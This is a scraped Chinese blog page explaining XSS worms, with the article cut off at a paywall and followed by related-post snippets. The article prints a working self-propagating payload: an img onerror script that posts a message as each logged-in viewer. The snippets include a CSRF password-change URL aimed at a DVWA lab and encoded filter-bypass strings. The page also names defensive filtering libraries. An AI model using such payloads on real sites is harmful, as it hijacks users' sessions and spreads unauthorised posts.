XSS蠕虫攻击

最新推荐文章于 2022-05-23 09:47:56 发布
最新推荐文章于 2022-05-23 09:47:56 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: Security 文章标签: XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_4538/article/details/82605164
版权
XSS蠕虫攻击是一种跨站脚本攻击,通过注入HTML代码导致恶意脚本执行。攻击者利用onerror事件获取用户信息,并在用户间传播。防御措施包括使用OWASP ESAPI、Apache Commons Lang的StringEscapeUtils以及Anti-Samy等开源库对用户输入进行过滤和编码,防止XSS攻击。
摘要由CSDN通过智能技术生成
XSS (cross-site scripting),即跨站脚本攻击,它的本质还是一种“HTML注入”,用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。

来看一张某网站遭受XSS攻击后的图片,
[img]http://dl2.iteye.com/upload/attachment/0101/3717/a83f235a-329f-30b0-9f85-3aa747d17f14.jpg[/img]

其实就是攻击者发送了一段html代码,就达到了上述的效果。 
<img height="0" width="0" src="xx" onerror='function fn(){n = $("#userName").html();$("textarea#pub_msg_input.msg-input").val(n + "说:虎牙妹妹长得真不错");$("#msg_send_bt").click();}setInterval(fn, 3000)'>


这段代码的大致意思是故意加载一张不存在的图片,于是出错后就执行了onerror中的js代码,这段js代码会获取当前登录用户的用户名,并使用同样的内容“虎牙妹妹长得真不错”进行发送,只要其他登录用户一打开此页面,并加载到刚才攻击者发送的内容,就会像蠕虫一样传染开。

解决办法可以使用第三方类库在后台将输入的文本进行过滤,可以在网上找到很多开源的“XSS Filter”的实现:
1、在OWASP ESAPI(Enterprise Sec
最低0.47元/天 解锁文章
iteye_4538
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浏览器原理和XSS蠕虫攻击
12-07
### 浏览器原理与XSS蠕虫攻击详解 #### 一、浏览器的分类和发展史 自互联网诞生以来,浏览器一直是连接用户与网络世界的桥梁。随着技术的进步与用户需求的变化,浏览器经历了从单一功能到多功能集成的发展过程。...
8、XSS 攻击的防御pdf资料
最新发布
10-15
攻击者可以利用这些漏洞盗取用户的账号信息、窃取Cookie来冒充用户身份、劫持用户会话、刷流量、弹出广告,甚至传播蠕虫病毒。XSS攻击的破坏性不容小觑。 XSS漏洞通常分为三类: 1. 反射型XSS:这种类型的XSS是非...
蠕虫病毒
cxu123321的博客
06-23 5590
蠕虫病毒 本词条由“科普中国”科学百科词条编写与应用工作项目审核 。 蠕虫病毒是一种常见的计算机病毒,是无须计算机使用者干预即可运行的独立程序,它通过不停的获得网络中存在漏洞的计算机上的部分或全部控制权来进行传播。计算机病毒是指编制或者在计算机程序中插入的破坏计算机功能或者破坏数据.影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。[1] 中文名 蠕虫病毒 外文名 Worm virus 类型 计算机病毒 传染方式 网络和电子邮件 目录 1定义 2特点 ...
xss漏洞之——XSS蠕虫、DDOS攻击
wsnbbz的博客
03-04 2123
介绍 通过构造的 XSS 代码,通过精心构造的 XSS 代码,可以实现非法转账、篡改信息、删除文章、自我复制等诸多功能。 此处以更改密码为例 代码: <img hidden src='http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Chang...
xss和csrf在dvwa中实现蠕虫攻击
qq_52469895的博客
04-10 493
验证csrf漏洞 我们先在自己这里改密码 然后看到上面有显示我们将上面的复制下来改为 http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change# 访问成功修改 测试一下 成功 验证xss漏洞 有xss漏洞 然后实现xss和csrf的蠕虫攻击xss存储型那里写入 <img src="h
mysql蠕虫攻击_XSS蠕虫攻击案例学习
weixin_42721619的博客
02-19 348
(1)看了下网站基于jQuery,那构造一个xssworm就简单很多(没有也无所谓,我们自己加载进去也可以的)​(2)我们来看看发帖的post动作,我们有burp截取一段数据包看看POST /info/UserInfo/modifyInfo HTTP/1.1Host: swust.0xiao.com......Cookie: no'info_sort_id=178&title=全新红米NO...
XSS——XSS Worm
王嘟嘟的博客
09-21 1577
0x00 前言 之前也从来没有学习到类似的东西,xss蠕虫,以前只是听说过,没想到是xss蠕虫,还是长见识了。破万卷书,作用还是很明显的。 0x01 学习笔记 1.第一个web2.0蠕虫病毒 2005年10月4日,第一个web2.0 蠕虫诞生了,在国外的社交网络MySpace上写了一段Javascript蠕虫代码。 2.实质 蠕虫的实质就是一段脚本程序,通常用JavaScript或者VBScri...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
XSS 蠕虫在社交网络中的传播分析 (2011年)
05-26
通过分析社交网络的特点,将节点分为活跃节点和非活跃节点。针对XSS 蠕虫的传播,分析其传播受到的影响因素,建立数学模型。仿真结果表明,节点访问偏向度对XSS 蠕虫传播影响较小,而XSS 蠕虫采用社会工程学的熟练度及节点安全意识,对XSS 蠕虫传播影响较大。活跃节点的安全意识较大程度影响了XSS 蠕虫传播效率,将活跃节点作为防御点和监控点的防御策略切实可行。
XSS跨站攻击课程.pdf
01-25
- **传播蠕虫病毒**:XSS攻击可以作为传播蠕虫病毒的手段之一。 #### 二、XSS分类 - **反射型XSS**: - **定义**:也称为非持久型或参数型跨站脚本攻击,是最常见的XSS类型之一。 - **特点**:通常出现在URL...
7. xss蠕虫
HWHXY的博客
01-17 1085
layout: post title: 7. xss蠕虫 category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第7篇小文章,内容为某网站的xss蠕虫XSS特征 触发点惊奇的出现在发送文章中,插入图片的地方可以执行js,由于是发布文章(真的没有想到现在还能这种洞,所以说不能自以为然),所以可以造成蠕虫。如下漏洞和代码都是队友林百万 所为,之前没有用过,特此记录一下。可蠕虫的存储型xss,属于高危害。 蠕虫代码 可以直接插入<scr.
XSS蠕虫病毒可能爆发 将威胁互联网安全
10-07 677
新闻来源:HARDSPELL/硬派网安全研究者最近发出警告,由于目前浏览器技术中的缺陷,互联网用户有可能面临一次非常严重的蠕虫病毒爆发。名为GNU Citizen的黑客组织已经发布了一些有关跨站脚本(cross-site scripting,XSS)漏洞的细节,据此可以通过浏览器向用户电脑植入恶意程序。蠕虫将能够扫描那些包含漏洞网页的IP地址,然后在整个网络上迅速流行开来。这些漏洞目前已经收录在X
【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击
XunanSec的博客
05-23 572
0x00 存储XSS 1) 可绕过的XSS 给大家分享个漏洞案例,今天上午刚把电脑修好 某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击) 注册处:http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过 储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0 他是先过滤再输出,而不是输出时过滤,从而导致可绕过 我们发现他输入时就进行了过滤,直接替换<script>a.
xss攻击之新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2594
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
XSS学习笔记(六)-XSS蠕虫
byteway的专栏
04-28 4809
3.XSS蠕虫 对于XSS蠕虫,无非就是在客户端提交的时候绕过过滤和转义,可以在继续在浏览器端执行的js 等代码,这里提供几种加密方式: 原型:alert(XSS) URL Encode: 大小写(所谓URL编码就是:把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+)) %3cscript%3ealert('XSS')%3c/script
一只XSS蠕虫的实现
0ffs3t
03-08 3927
Author: kunting520 EMail: kunting520@gmail.com Date: 2011-06-20 [ 目录 ] 0×-1 声明 0×00 前言 0×01 关于XSS 0×02 发现XSS 0×03 蠕虫实现 0×04 总结 0×-1 声明 前两天,在土司上发一帖子(http://t00ls.net/thread-16240-1-2
校内网--自动分享视频-flash xss蠕虫分析
wangqiuyun的专栏
08-22 2271
晚上很晚~11点半才回来,洗漱完毕都12点多了,本来想关电脑就睡觉,谁知道校内还在挂着,习惯性刷新了一下,呵,好几个哥们的状态都是校内有毒,千万别打开个什么视频分享贴,嘿,早就听所校内BUG多,这回我倒要亲自看看了,点开站内信,果然一位好友个我分享了一个视频: Wish You Were Here @ 2016. Pink Floyd - Wish You Were Here http://
xss蠕虫是怎么进行攻击
05-14
为了避免XSS蠕虫攻击,网站开发者可以采取以下措施: 1. 对用户输入进行严格的过滤,避免注入恶意脚本。 2. 在网站中使用CSP(Content Security Policy)等安全机制,限制恶意脚本的执行。 3. 及时修补XSS漏洞,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值